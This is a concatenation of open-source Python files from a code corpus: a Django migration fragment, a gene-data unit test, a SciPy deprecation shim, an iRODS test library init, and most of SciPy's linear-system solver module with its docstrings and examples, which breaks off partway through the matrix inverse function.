field=models.TextField(help_text=b"The HTML framework for this template. Use <code>{{ any_variable_name }}</code> for per-event tags. Other Jinja2 constructs are available, along with the related <code>request</code>, <code>datetime</code>, <code>event</code> objects, and the <code>md5</code> function. You can also reference <code>autoplay</code> and it's always safe. Additionally we have <code>vidly_tokenize(tag, seconds)</code>, <code>edgecast_tokenize([seconds], **kwargs)</code> and <code>akamai_tokenize([seconds], **kwargs)</code><br> Warning! Changes affect all events associated with this template."),
preserve_default=True,
),
]
| blossomica/airmozilla | airmozilla/main/migrations/0013_auto_20160223_1757.py | Python | bsd-3-clause | 1,622 |
#!/usr/bin/env python3
import unittest
import logging
from tests.test_source import SourceTestCase
from dipper.sources.HGNC import HGNC
logging.basicConfig(level=logging.WARNING)
logger = logging.getLogger(__name__)
class HGNCTestCase(SourceTestCase):
def setUp(self):
self.source = HGNC('rdf_graph', True)
self.source.test_ids = self.all_test_ids['gene']
self.source.settestonly(True)
self._setDirToSource()
return
def tearDown(self):
self.source = None
return
if __name__ == '__main__':
unittest.main()
| TomConlin/dipper | tests/test_hgnc.py | Python | bsd-3-clause | 580 |
# This file is not meant for public use and will be removed in SciPy v2.0.0.
# Use the `scipy.io` namespace for importing the functions
# included below.
import warnings
from . import _harwell_boeing
__all__ = [ # noqa: F822
'MalformedHeader', 'hb_read', 'hb_write', 'HBInfo',
'HBFile', 'HBMatrixType', 'FortranFormatParser', 'IntFormat',
'ExpFormat', 'BadFortranFormat'
]
def __dir__():
return __all__
def __getattr__(name):
if name not in __all__:
raise AttributeError(
"scipy.io.harwell_boeing is deprecated and has no attribute "
f"{name}. Try looking in scipy.io instead.")
warnings.warn(f"Please use `{name}` from the `scipy.io` namespace, "
"the `scipy.io.harwell_boeing` namespace is deprecated.",
category=DeprecationWarning, stacklevel=2)
return getattr(_harwell_boeing, name)
| grlee77/scipy | scipy/io/harwell_boeing.py | Python | bsd-3-clause | 892 |
from iRODSLibrary import iRODSLibrary
__version__ = "0.0.4"
class iRODSLibrary(iRODSLibrary):
""" iRODSLibrary is a client keyword library that uses
the python-irodsclient module from iRODS
https://github.com/irods/python-irodsclient
Examples:
| Connect To Grid | iPlant | data.iplantcollaborative.org | ${1247} | jdoe | jdoePassword | tempZone
"""
ROBOT_LIBRARY_SCOPE = 'GLOBAL'
| jerry57/Robotframework-iRODS-Library | src/iRODSLibrary/__init__.py | Python | bsd-3-clause | 422 |
#
# Author: Pearu Peterson, March 2002
#
# w/ additions by Travis Oliphant, March 2002
# and Jake Vanderplas, August 2012
from __future__ import division, print_function, absolute_import
from warnings import warn
import numpy as np
from numpy import atleast_1d, atleast_2d
from .flinalg import get_flinalg_funcs
from .lapack import get_lapack_funcs, _compute_lwork
from .misc import LinAlgError, _datacopied, LinAlgWarning
from .decomp import _asarray_validated
from . import decomp, decomp_svd
from ._solve_toeplitz import levinson
__all__ = ['solve', 'solve_triangular', 'solveh_banded', 'solve_banded',
'solve_toeplitz', 'solve_circulant', 'inv', 'det', 'lstsq',
'pinv', 'pinv2', 'pinvh', 'matrix_balance']
# Linear equations
def _solve_check(n, info, lamch=None, rcond=None):
""" Check arguments during the different steps of the solution phase """
if info < 0:
raise ValueError('LAPACK reported an illegal value in {}-th argument'
'.'.format(-info))
elif 0 < info:
raise LinAlgError('Matrix is singular.')
if lamch is None:
return
E = lamch('E')
if rcond < E:
warn('Ill-conditioned matrix (rcond={:.6g}): '
'result may not be accurate.'.format(rcond),
LinAlgWarning, stacklevel=3)
def solve(a, b, sym_pos=False, lower=False, overwrite_a=False,
overwrite_b=False, debug=None, check_finite=True, assume_a='gen',
transposed=False):
"""
Solves the linear equation set ``a * x = b`` for the unknown ``x``
for square ``a`` matrix.
If the data matrix is known to be a particular type then supplying the
corresponding string to ``assume_a`` key chooses the dedicated solver.
The available options are
=================== ========
generic matrix 'gen'
symmetric 'sym'
hermitian 'her'
positive definite 'pos'
=================== ========
If omitted, ``'gen'`` is the default structure.
The datatype of the arrays define which solver is called regardless
of the values. In other words, even when the complex array entries have
precisely zero imaginary parts, the complex solver will be called based
on the data type of the array.
Parameters
----------
a : (N, N) array_like
Square input data
b : (N, NRHS) array_like
Input data for the right hand side.
sym_pos : bool, optional
Assume `a` is symmetric and positive definite. This key is deprecated
and assume_a = 'pos' keyword is recommended instead. The functionality
is the same. It will be removed in the future.
lower : bool, optional
If True, only the data contained in the lower triangle of `a`. Default
is to use upper triangle. (ignored for ``'gen'``)
overwrite_a : bool, optional
Allow overwriting data in `a` (may enhance performance).
Default is False.
overwrite_b : bool, optional
Allow overwriting data in `b` (may enhance performance).
Default is False.
check_finite : bool, optional
Whether to check that the input matrices contain only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
assume_a : str, optional
Valid entries are explained above.
transposed : bool, optional
If True, solve ``a^T x = b`` instead. Only implemented for real
matrices; a complex `a` with ``transposed=True`` raises
`NotImplementedError`.
Returns
-------
x : (N, NRHS) ndarray
The solution array.
Raises
------
ValueError
If size mismatches detected or input a is not square.
LinAlgError
If the matrix is singular.
LinAlgWarning
If an ill-conditioned input a is detected.
NotImplementedError
If transposed is True and input a is a complex matrix.
Examples
--------
Given `a` and `b`, solve for `x`:
>>> a = np.array([[3, 2, 0], [1, -1, 0], [0, 5, 1]])
>>> b = np.array([2, 4, -1])
>>> from scipy import linalg
>>> x = linalg.solve(a, b)
>>> x
array([ 2., -2., 9.])
>>> np.dot(a, x) == b
array([ True, True, True], dtype=bool)
Notes
-----
If the input b matrix is a 1D array with N elements, when supplied
together with an NxN input a, it is assumed as a valid column vector
despite the apparent size mismatch. This is compatible with the
numpy.dot() behavior and the returned result is still 1D array.
The generic, symmetric, hermitian and positive definite solutions are
obtained via calling ?GESV, ?SYSV, ?HESV, and ?POSV routines of
LAPACK respectively.
"""
# Flags for 1D or nD right hand side
b_is_1D = False
a1 = atleast_2d(_asarray_validated(a, check_finite=check_finite))
b1 = atleast_1d(_asarray_validated(b, check_finite=check_finite))
n = a1.shape[0]
overwrite_a = overwrite_a or _datacopied(a1, a)
overwrite_b = overwrite_b or _datacopied(b1, b)
if a1.shape[0] != a1.shape[1]:
raise ValueError('Input a needs to be a square matrix.')
if n != b1.shape[0]:
# Last chance to catch 1x1 scalar a and 1D b arrays
if not (n == 1 and b1.size != 0):
raise ValueError('Input b has to have same number of rows as '
'input a')
# accommodate empty arrays
if b1.size == 0:
return np.asfortranarray(b1.copy())
# regularize 1D b arrays to 2D
if b1.ndim == 1:
if n == 1:
b1 = b1[None, :]
else:
b1 = b1[:, None]
b_is_1D = True
# Backwards compatibility - old keyword.
if sym_pos:
assume_a = 'pos'
if assume_a not in ('gen', 'sym', 'her', 'pos'):
raise ValueError('{} is not a recognized matrix structure'
''.format(assume_a))
# Deprecate keyword "debug"
if debug is not None:
warn('Use of the "debug" keyword is deprecated '
'and this keyword will be removed in future '
'versions of SciPy.', DeprecationWarning, stacklevel=2)
# Get the correct lamch function.
# The LAMCH functions only exist for S and D,
# so for complex values we have to convert to real/double.
if a1.dtype.char in 'fF': # single precision
lamch = get_lapack_funcs('lamch', dtype='f')
else:
lamch = get_lapack_funcs('lamch', dtype='d')
# Currently we do not have the other forms of the norm calculators
# lansy, lanpo, lanhe.
# However, in any case they only reduce computations slightly...
lange = get_lapack_funcs('lange', (a1,))
# Since the I-norm and 1-norm are the same for symmetric matrices
# we can collect them all in this one call.
# Note, however, that when issuing 'gen' and form != 'none',
# the I-norm should be used.
if transposed:
trans = 1
norm = 'I'
if np.iscomplexobj(a1):
raise NotImplementedError('scipy.linalg.solve can currently '
'not solve a^T x = b or a^H x = b '
'for complex matrices.')
else:
trans = 0
norm = '1'
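# The norm of a (1-norm, or inf-norm for the transposed system) is
# needed below for the reciprocal condition number estimate.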
anorm = lange(norm, a1)
# Generalized case 'gesv'
if assume_a == 'gen':
gecon, getrf, getrs = get_lapack_funcs(('gecon', 'getrf', 'getrs'),
(a1, b1))
lu, ipvt, info = getrf(a1, overwrite_a=overwrite_a)
_solve_check(n, info)
x, info = getrs(lu, ipvt, b1,
trans=trans, overwrite_b=overwrite_b)
_solve_check(n, info)
rcond, info = gecon(lu, anorm, norm=norm)
# Hermitian case 'hesv'
elif assume_a == 'her':
hecon, hesv, hesv_lw = get_lapack_funcs(('hecon', 'hesv',
'hesv_lwork'), (a1, b1))
lwork = _compute_lwork(hesv_lw, n, lower)
lu, ipvt, x, info = hesv(a1, b1, lwork=lwork,
lower=lower,
overwrite_a=overwrite_a,
overwrite_b=overwrite_b)
_solve_check(n, info)
rcond, info = hecon(lu, ipvt, anorm)
# Symmetric case 'sysv'
elif assume_a == 'sym':
sycon, sysv, sysv_lw = get_lapack_funcs(('sycon', 'sysv',
'sysv_lwork'), (a1, b1))
lwork = _compute_lwork(sysv_lw, n, lower)
lu, ipvt, x, info = sysv(a1, b1, lwork=lwork,
lower=lower,
overwrite_a=overwrite_a,
overwrite_b=overwrite_b)
_solve_check(n, info)
rcond, info = sycon(lu, ipvt, anorm)
# Positive definite case 'posv'
else:
pocon, posv = get_lapack_funcs(('pocon', 'posv'),
(a1, b1))
lu, x, info = posv(a1, b1, lower=lower,
overwrite_a=overwrite_a,
overwrite_b=overwrite_b)
_solve_check(n, info)
rcond, info = pocon(lu, anorm)
_solve_check(n, info, lamch, rcond)
if b_is_1D:
x = x.ravel()
return x
def solve_triangular(a, b, trans=0, lower=False, unit_diagonal=False,
overwrite_b=False, debug=None, check_finite=True):
"""
Solve the equation `a x = b` for `x`, assuming a is a triangular matrix.
Parameters
----------
a : (M, M) array_like
A triangular matrix
b : (M,) or (M, N) array_like
Right-hand side matrix in `a x = b`
lower : bool, optional
Use only data contained in the lower triangle of `a`.
Default is to use upper triangle.
trans : {0, 1, 2, 'N', 'T', 'C'}, optional
Type of system to solve:
======== =========
trans    system
======== =========
0 or 'N' a x = b
1 or 'T' a^T x = b
2 or 'C' a^H x = b
======== =========
unit_diagonal : bool, optional
If True, diagonal elements of `a` are assumed to be 1 and
will not be referenced.
overwrite_b : bool, optional
Allow overwriting data in `b` (may enhance performance)
check_finite : bool, optional
Whether to check that the input matrices contain only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
x : (M,) or (M, N) ndarray
Solution to the system `a x = b`. Shape of return matches `b`.
Raises
------
LinAlgError
If `a` is singular
Notes
-----
.. versionadded:: 0.9.0
Examples
--------
Solve the lower triangular system a x = b, where::
    [3  0  0  0]     [4]
a = [2  1  0  0] b = [2]
    [1  0  1  0]     [4]
    [1  1  1  1]     [2]
>>> from scipy.linalg import solve_triangular
>>> a = np.array([[3, 0, 0, 0], [2, 1, 0, 0], [1, 0, 1, 0], [1, 1, 1, 1]])
>>> b = np.array([4, 2, 4, 2])
>>> x = solve_triangular(a, b, lower=True)
>>> x
array([ 1.33333333, -0.66666667, 2.66666667, -1.33333333])
>>> a.dot(x) # Check the result
array([ 4., 2., 4., 2.])
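The ``trans`` keyword selects which system is solved; a minimal sketch
solving the transposed system ``a^T x = b`` with the same data:
>>> xt = solve_triangular(a, b, trans='T', lower=True)
>>> np.allclose(a.T.dot(xt), b)
True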
"""
# Deprecate keyword "debug"
if debug is not None:
warn('Use of the "debug" keyword is deprecated '
'and this keyword will be removed in the future '
'versions of SciPy.', DeprecationWarning, stacklevel=2)
a1 = _asarray_validated(a, check_finite=check_finite)
b1 = _asarray_validated(b, check_finite=check_finite)
if len(a1.shape) != 2 or a1.shape[0] != a1.shape[1]:
raise ValueError('expected square matrix')
if a1.shape[0] != b1.shape[0]:
raise ValueError('incompatible dimensions')
overwrite_b = overwrite_b or _datacopied(b1, b)
if debug:
print('solve:overwrite_b=', overwrite_b)
trans = {'N': 0, 'T': 1, 'C': 2}.get(trans, trans)
trtrs, = get_lapack_funcs(('trtrs',), (a1, b1))
x, info = trtrs(a1, b1, overwrite_b=overwrite_b, lower=lower,
trans=trans, unitdiag=unit_diagonal)
if info == 0:
return x
if info > 0:
raise LinAlgError("singular matrix: resolution failed at diagonal %d" %
(info-1))
raise ValueError('illegal value in %d-th argument of internal trtrs' %
(-info))
def solve_banded(l_and_u, ab, b, overwrite_ab=False, overwrite_b=False,
debug=None, check_finite=True):
"""
Solve the equation a x = b for x, assuming a is a banded matrix.
The matrix a is stored in `ab` using the matrix diagonal ordered form::
ab[u + i - j, j] == a[i,j]
Example of `ab` (shape of a is (6,6), `u` =1, `l` =2)::
 *   a01  a12  a23  a34  a45
a00  a11  a22  a33  a44  a55
a10  a21  a32  a43  a54   *
a20  a31  a42  a53   *    *
Parameters
----------
(l, u) : (integer, integer)
Number of non-zero lower and upper diagonals
ab : (`l` + `u` + 1, M) array_like
Banded matrix
b : (M,) or (M, K) array_like
Right-hand side
overwrite_ab : bool, optional
Discard data in `ab` (may enhance performance)
overwrite_b : bool, optional
Discard data in `b` (may enhance performance)
check_finite : bool, optional
Whether to check that the input matrices contain only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
x : (M,) or (M, K) ndarray
The solution to the system a x = b. Returned shape depends on the
shape of `b`.
Examples
--------
Solve the banded system a x = b, where::
    [5  2 -1  0  0]       [0]
    [1  4  2 -1  0]       [1]
a = [0  1  3  2 -1]   b = [2]
    [0  0  1  2  2]       [2]
    [0  0  0  1  1]       [3]
There is one nonzero diagonal below the main diagonal (l = 1), and
two above (u = 2). The diagonal banded form of the matrix is::
     [ *  * -1 -1 -1]
ab = [ *  2  2  2  2]
     [ 5  4  3  2  1]
     [ 1  1  1  1  *]
>>> from scipy.linalg import solve_banded
>>> ab = np.array([[0, 0, -1, -1, -1],
... [0, 2, 2, 2, 2],
... [5, 4, 3, 2, 1],
... [1, 1, 1, 1, 0]])
>>> b = np.array([0, 1, 2, 2, 3])
>>> x = solve_banded((1, 2), ab, b)
>>> x
array([-2.37288136, 3.93220339, -4. , 4.3559322 , -1.3559322 ])
"""
# Deprecate keyword "debug"
if debug is not None:
warn('Use of the "debug" keyword is deprecated '
'and this keyword will be removed in the future '
'versions of SciPy.', DeprecationWarning, stacklevel=2)
a1 = _asarray_validated(ab, check_finite=check_finite, as_inexact=True)
b1 = _asarray_validated(b, check_finite=check_finite, as_inexact=True)
# Validate shapes.
if a1.shape[-1] != b1.shape[0]:
raise ValueError("shapes of ab and b are not compatible.")
(nlower, nupper) = l_and_u
if nlower + nupper + 1 != a1.shape[0]:
raise ValueError("invalid values for the number of lower and upper "
"diagonals: l+u+1 (%d) does not equal ab.shape[0] "
"(%d)" % (nlower + nupper + 1, ab.shape[0]))
overwrite_b = overwrite_b or _datacopied(b1, b)
if a1.shape[-1] == 1:
b2 = np.array(b1, copy=(not overwrite_b))
b2 /= a1[1, 0]
return b2
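# Tridiagonal case: dispatch to the dedicated LAPACK ?gtsv solver.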
if nlower == nupper == 1:
overwrite_ab = overwrite_ab or _datacopied(a1, ab)
gtsv, = get_lapack_funcs(('gtsv',), (a1, b1))
du = a1[0, 1:]
d = a1[1, :]
dl = a1[2, :-1]
du2, d, du, x, info = gtsv(dl, d, du, b1, overwrite_ab, overwrite_ab,
overwrite_ab, overwrite_b)
else:
gbsv, = get_lapack_funcs(('gbsv',), (a1, b1))
a2 = np.zeros((2*nlower + nupper + 1, a1.shape[1]), dtype=gbsv.dtype)
a2[nlower:, :] = a1
lu, piv, x, info = gbsv(nlower, nupper, a2, b1, overwrite_ab=True,
overwrite_b=overwrite_b)
if info == 0:
return x
if info > 0:
raise LinAlgError("singular matrix")
raise ValueError('illegal value in %d-th argument of internal '
'gbsv/gtsv' % -info)
def solveh_banded(ab, b, overwrite_ab=False, overwrite_b=False, lower=False,
check_finite=True):
"""
Solve the equation a x = b for x, where a is a Hermitian
positive-definite banded matrix.
The matrix a is stored in `ab` either in lower diagonal or upper
diagonal ordered form:
ab[u + i - j, j] == a[i,j] (if upper form; i <= j)
ab[ i - j, j] == a[i,j] (if lower form; i >= j)
Example of `ab` (shape of a is (6, 6), `u` =2)::
upper form:
 *    *   a02  a13  a24  a35
 *   a01  a12  a23  a34  a45
a00  a11  a22  a33  a44  a55
lower form:
a00  a11  a22  a33  a44  a55
a10  a21  a32  a43  a54   *
a20  a31  a42  a53   *    *
Cells marked with * are not used.
Parameters
----------
ab : (`u` + 1, M) array_like
Banded matrix
b : (M,) or (M, K) array_like
Right-hand side
overwrite_ab : bool, optional
Discard data in `ab` (may enhance performance)
overwrite_b : bool, optional
Discard data in `b` (may enhance performance)
lower : bool, optional
Whether the matrix is in the lower form. (Default is upper form.)
check_finite : bool, optional
Whether to check that the input matrices contain only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
x : (M,) or (M, K) ndarray
The solution to the system a x = b. Shape of return matches shape
of `b`.
Examples
--------
Solve the banded system A x = b, where::
    [ 4  2 -1  0  0  0]       [1]
    [ 2  5  2 -1  0  0]       [2]
A = [-1  2  6  2 -1  0]   b = [2]
    [ 0 -1  2  7  2 -1]       [3]
    [ 0  0 -1  2  8  2]       [3]
    [ 0  0  0 -1  2  9]       [3]
>>> from scipy.linalg import solveh_banded
`ab` contains the main diagonal and the nonzero diagonals below the
main diagonal. That is, we use the lower form:
>>> ab = np.array([[ 4, 5, 6, 7, 8, 9],
... [ 2, 2, 2, 2, 2, 0],
... [-1, -1, -1, -1, 0, 0]])
>>> b = np.array([1, 2, 2, 3, 3, 3])
>>> x = solveh_banded(ab, b, lower=True)
>>> x
array([ 0.03431373, 0.45938375, 0.05602241, 0.47759104, 0.17577031,
0.34733894])
Solve the Hermitian banded system H x = b, where::
    [ 8   2-1j   0     0  ]        [ 1  ]
H = [2+1j  5     1j    0  ]    b = [1+1j]
    [ 0    -1j   9   -2-1j]        [1-2j]
    [ 0    0   -2+1j   6  ]        [ 0  ]
In this example, we put the upper diagonals in the array `hb`:
>>> hb = np.array([[0, 2-1j, 1j, -2-1j],
... [8, 5, 9, 6 ]])
>>> b = np.array([1, 1+1j, 1-2j, 0])
>>> x = solveh_banded(hb, b)
>>> x
array([ 0.07318536-0.02939412j, 0.11877624+0.17696461j,
0.10077984-0.23035393j, -0.00479904-0.09358128j])
"""
a1 = _asarray_validated(ab, check_finite=check_finite)
b1 = _asarray_validated(b, check_finite=check_finite)
# Validate shapes.
if a1.shape[-1] != b1.shape[0]:
raise ValueError("shapes of ab and b are not compatible.")
overwrite_b = overwrite_b or _datacopied(b1, b)
overwrite_ab = overwrite_ab or _datacopied(a1, ab)
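# A single band next to the main diagonal: the matrix is tridiagonal,
# so dispatch to the dedicated LAPACK ?ptsv solver.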
if a1.shape[0] == 2:
ptsv, = get_lapack_funcs(('ptsv',), (a1, b1))
if lower:
d = a1[0, :].real
e = a1[1, :-1]
else:
d = a1[1, :].real
e = a1[0, 1:].conj()
d, du, x, info = ptsv(d, e, b1, overwrite_ab, overwrite_ab,
overwrite_b)
else:
pbsv, = get_lapack_funcs(('pbsv',), (a1, b1))
c, x, info = pbsv(a1, b1, lower=lower, overwrite_ab=overwrite_ab,
overwrite_b=overwrite_b)
if info > 0:
raise LinAlgError("%d-th leading minor not positive definite" % info)
if info < 0:
raise ValueError('illegal value in %d-th argument of internal '
'pbsv' % -info)
return x
def solve_toeplitz(c_or_cr, b, check_finite=True):
"""Solve a Toeplitz system using Levinson Recursion
The Toeplitz matrix has constant diagonals, with c as its first column
and r as its first row. If r is not given, ``r == conjugate(c)`` is
assumed.
Parameters
----------
c_or_cr : array_like or tuple of (array_like, array_like)
The vector ``c``, or a tuple of arrays (``c``, ``r``). Whatever the
actual shape of ``c``, it will be converted to a 1-D array. If not
supplied, ``r = conjugate(c)`` is assumed; in this case, if c[0] is
real, the Toeplitz matrix is Hermitian. r[0] is ignored; the first row
of the Toeplitz matrix is ``[c[0], r[1:]]``. Whatever the actual shape
of ``r``, it will be converted to a 1-D array.
b : (M,) or (M, K) array_like
Right-hand side in ``T x = b``.
check_finite : bool, optional
Whether to check that the input matrices contain only finite numbers.
Disabling may give a performance gain, but may result in problems
(result entirely NaNs) if the inputs do contain infinities or NaNs.
Returns
-------
x : (M,) or (M, K) ndarray
The solution to the system ``T x = b``. Shape of return matches shape
of `b`.
See Also
--------
toeplitz : Toeplitz matrix
Notes
-----
The solution is computed using Levinson-Durbin recursion, which is faster
than generic least-squares methods, but can be less numerically stable.
Examples
--------
Solve the Toeplitz system T x = b, where::
    [ 1 -1 -2 -3]       [1]
T = [ 3  1 -1 -2]   b = [2]
    [ 6  3  1 -1]       [2]
    [10  6  3  1]       [5]
To specify the Toeplitz matrix, only the first column and the first
row are needed.
>>> c = np.array([1, 3, 6, 10]) # First column of T
>>> r = np.array([1, -1, -2, -3]) # First row of T
>>> b = np.array([1, 2, 2, 5])
>>> from scipy.linalg import solve_toeplitz, toeplitz
>>> x = solve_toeplitz((c, r), b)
>>> x
array([ 1.66666667, -1. , -2.66666667, 2.33333333])
Check the result by creating the full Toeplitz matrix and
multiplying it by `x`. We should get `b`.
>>> T = toeplitz(c, r)
>>> T.dot(x)
array([ 1., 2., 2., 5.])
"""
# If numerical stability of this algorithm is a problem, a future
# developer might consider implementing other O(N^2) Toeplitz solvers,
# such as GKO (https://www.jstor.org/stable/2153371) or Bareiss.
if isinstance(c_or_cr, tuple):
c, r = c_or_cr
c = _asarray_validated(c, check_finite=check_finite).ravel()
r = _asarray_validated(r, check_finite=check_finite).ravel()
else:
c = _asarray_validated(c_or_cr, check_finite=check_finite).ravel()
r = c.conjugate()
# Form a 1D array of values to be used in the matrix, containing a reversed
# copy of r[1:], followed by c.
vals = np.concatenate((r[-1:0:-1], c))
if b is None:
raise ValueError('illegal value, `b` is a required argument')
b = _asarray_validated(b)
if vals.shape[0] != (2*b.shape[0] - 1):
raise ValueError('incompatible dimensions')
if np.iscomplexobj(vals) or np.iscomplexobj(b):
vals = np.asarray(vals, dtype=np.complex128, order='c')
b = np.asarray(b, dtype=np.complex128)
else:
vals = np.asarray(vals, dtype=np.double, order='c')
b = np.asarray(b, dtype=np.double)
if b.ndim == 1:
x, _ = levinson(vals, np.ascontiguousarray(b))
else:
b_shape = b.shape
b = b.reshape(b.shape[0], -1)
x = np.column_stack([levinson(vals, np.ascontiguousarray(b[:, i]))[0]
for i in range(b.shape[1])])
x = x.reshape(*b_shape)
return x
def _get_axis_len(aname, a, axis):
ax = axis
if ax < 0:
ax += a.ndim
if 0 <= ax < a.ndim:
return a.shape[ax]
raise ValueError("'%saxis' entry is out of bounds" % (aname,))
def solve_circulant(c, b, singular='raise', tol=None,
caxis=-1, baxis=0, outaxis=0):
"""Solve C x = b for x, where C is a circulant matrix.
`C` is the circulant matrix associated with the vector `c`.
The system is solved by doing division in Fourier space. The
calculation is::
x = ifft(fft(b) / fft(c))
where `fft` and `ifft` are the fast Fourier transform and its inverse,
respectively. For a large vector `c`, this is *much* faster than
solving the system with the full circulant matrix.
Parameters
----------
c : array_like
The coefficients of the circulant matrix.
b : array_like
Right-hand side matrix in ``a x = b``.
singular : str, optional
This argument controls how a near singular circulant matrix is
handled. If `singular` is "raise" and the circulant matrix is
near singular, a `LinAlgError` is raised. If `singular` is
"lstsq", the least squares solution is returned. Default is "raise".
tol : float, optional
If any eigenvalue of the circulant matrix has an absolute value
that is less than or equal to `tol`, the matrix is considered to be
near singular. If not given, `tol` is set to::
tol = abs_eigs.max() * abs_eigs.size * np.finfo(np.float64).eps
where `abs_eigs` is the array of absolute values of the eigenvalues
of the circulant matrix.
caxis : int
When `c` has dimension greater than 1, it is viewed as a collection
of circulant vectors. In this case, `caxis` is the axis of `c` that
holds the vectors of circulant coefficients.
baxis : int
When `b` has dimension greater than 1, it is viewed as a collection
of vectors. In this case, `baxis` is the axis of `b` that holds the
right-hand side vectors.
outaxis : int
When `c` or `b` are multidimensional, the value returned by
`solve_circulant` is multidimensional. In this case, `outaxis` is
the axis of the result that holds the solution vectors.
Returns
-------
x : ndarray
Solution to the system ``C x = b``.
Raises
------
LinAlgError
If the circulant matrix associated with `c` is near singular.
See Also
--------
circulant : circulant matrix
Notes
-----
For a one-dimensional vector `c` with length `m`, and an array `b`
with shape ``(m, ...)``, ``solve_circulant(c, b)`` returns the same
result as ``solve(circulant(c), b)``, where `solve` and `circulant`
are from `scipy.linalg`.
.. versionadded:: 0.16.0
Examples
--------
>>> from scipy.linalg import solve_circulant, solve, circulant, lstsq
>>> c = np.array([2, 2, 4])
>>> b = np.array([1, 2, 3])
>>> solve_circulant(c, b)
array([ 0.75, -0.25, 0.25])
Compare that result to solving the system with `scipy.linalg.solve`:
>>> solve(circulant(c), b)
array([ 0.75, -0.25, 0.25])
A singular example:
>>> c = np.array([1, 1, 0, 0])
>>> b = np.array([1, 2, 3, 4])
Calling ``solve_circulant(c, b)`` will raise a `LinAlgError`. For the
least square solution, use the option ``singular='lstsq'``:
>>> solve_circulant(c, b, singular='lstsq')
array([ 0.25, 1.25, 2.25, 1.25])
Compare to `scipy.linalg.lstsq`:
>>> x, resid, rnk, s = lstsq(circulant(c), b)
>>> x
array([ 0.25, 1.25, 2.25, 1.25])
A broadcasting example:
Suppose we have the vectors of two circulant matrices stored in an array
with shape (2, 5), and three `b` vectors stored in an array with shape
(3, 5). For example,
>>> c = np.array([[1.5, 2, 3, 0, 0], [1, 1, 4, 3, 2]])
>>> b = np.arange(15).reshape(-1, 5)
We want to solve all combinations of circulant matrices and `b` vectors,
with the result stored in an array with shape (2, 3, 5). When we
disregard the axes of `c` and `b` that hold the vectors of coefficients,
the shapes of the collections are (2,) and (3,), respectively, which are
not compatible for broadcasting. To have a broadcast result with shape
(2, 3), we add a trivial dimension to `c`: ``c[:, np.newaxis, :]`` has
shape (2, 1, 5). The last dimension holds the coefficients of the
circulant matrices, so when we call `solve_circulant`, we can use the
default ``caxis=-1``. The coefficients of the `b` vectors are in the last
dimension of the array `b`, so we use ``baxis=-1``. If we use the
default `outaxis`, the result will have shape (5, 2, 3), so we'll use
``outaxis=-1`` to put the solution vectors in the last dimension.
>>> x = solve_circulant(c[:, np.newaxis, :], b, baxis=-1, outaxis=-1)
>>> x.shape
(2, 3, 5)
>>> np.set_printoptions(precision=3) # For compact output of numbers.
>>> x
array([[[-0.118, 0.22 , 1.277, -0.142, 0.302],
[ 0.651, 0.989, 2.046, 0.627, 1.072],
[ 1.42 , 1.758, 2.816, 1.396, 1.841]],
[[ 0.401, 0.304, 0.694, -0.867, 0.377],
[ 0.856, 0.758, 1.149, -0.412, 0.831],
[ 1.31 , 1.213, 1.603, 0.042, 1.286]]])
Check by solving one pair of `c` and `b` vectors (cf. ``x[1, 1, :]``):
>>> solve_circulant(c[1], b[1, :])
array([ 0.856, 0.758, 1.149, -0.412, 0.831])
"""
c = np.atleast_1d(c)
nc = _get_axis_len("c", c, caxis)
b = np.atleast_1d(b)
nb = _get_axis_len("b", b, baxis)
if nc != nb:
raise ValueError('Incompatible c and b axis lengths')
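# Move the axis holding the circulant coefficients to the end and
# compute the FFT of each coefficient vector.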
fc = np.fft.fft(np.rollaxis(c, caxis, c.ndim), axis=-1)
abs_fc = np.abs(fc)
if tol is None:
# This is the same tolerance as used in np.linalg.matrix_rank.
tol = abs_fc.max(axis=-1) * nc * np.finfo(np.float64).eps
if tol.shape != ():
tol.shape = tol.shape + (1,)
else:
tol = np.atleast_1d(tol)
near_zeros = abs_fc <= tol
is_near_singular = np.any(near_zeros)
if is_near_singular:
if singular == 'raise':
raise LinAlgError("near singular circulant matrix.")
else:
# Replace the small values with 1 to avoid errors in the
# division fb/fc below.
fc[near_zeros] = 1
fb = np.fft.fft(np.rollaxis(b, baxis, b.ndim), axis=-1)
q = fb / fc
if is_near_singular:
# `near_zeros` is a boolean array, same shape as `c`, that is
# True where `fc` is (near) zero. `q` is the broadcasted result
# of fb / fc, so to set the values of `q` to 0 where `fc` is near
# zero, we use a mask that is the broadcast result of an array
# of True values shaped like `b` with `near_zeros`.
mask = np.ones_like(b, dtype=bool) & near_zeros
q[mask] = 0
x = np.fft.ifft(q, axis=-1)
if not (np.iscomplexobj(c) or np.iscomplexobj(b)):
x = x.real
if outaxis != -1:
x = np.rollaxis(x, -1, outaxis)
return x
# matrix inversion
def inv(a, overwrite_a=False, check_finite=True):
"""
Compute the inverse of a matrix.
Parameters
----------
a : array_like
Square matrix to be inverted.
overwrite_a : bool, optional
Discard data in `a` (may improve performance). Default is False.
check_finite : bool, optional
Whether to check that the input matrix contains only finite numbers.
Disabling may give a performance gain, but may result in problems
(crashes, non-termination) if the inputs do contain infinities or NaNs.
Returns
-------
ainv : ndarray
Inverse of the matrix `a`.
Raises
------
LinAlgError
If `a` is singular.
ValueError
If `a` is not square, or not 2-dimensional.
Examples
--------
>>> from scipy import linalg
>>> a = np.array([[1., 2.], [3., 4.]])
>>> linalg.inv(a)
array([[-2. , 1. ],
[ 1.5, -0.5]])
>>> np.dot(a, linalg.inv(a))
array([[ 1., 0.],
[ 0., 1.]])
"""
a1 = _asarray_validated(a, check_finite=check_finite)
if len(a1.shape) != 2 or a1.shape[0] != a1.shape[1]:
raise ValueError('expected square matrix')
overwrite_a = overwrite_a or _datacopied(a1, a)
# XXX: I found no advantage or disadvantage of using finv.
# finv, = get_flinalg_funcs(('inv',),(a1,))
# if finv is not None:
# a_inv,info = finv(a1,overwrite_a=overwrite_a)
# if info==0:
# return a_inv
# if info>0: raise LinAlgError, "singular matrix"
# if info<0: raise ValueError('illegal value in %d-th argument of '
# 'internal inv.getrf|getri'%(-info))
getrf, getri, getri_lwork = get_lapack_funcs(('getrf', 'getri',
'getri_lwork'),
(a1,))
lu, piv, info = getrf(a1, overwrite_a=overwrite_a)
if info == 0:
lwork = _compute_lwork(getri_lwork, a1.shape[0])
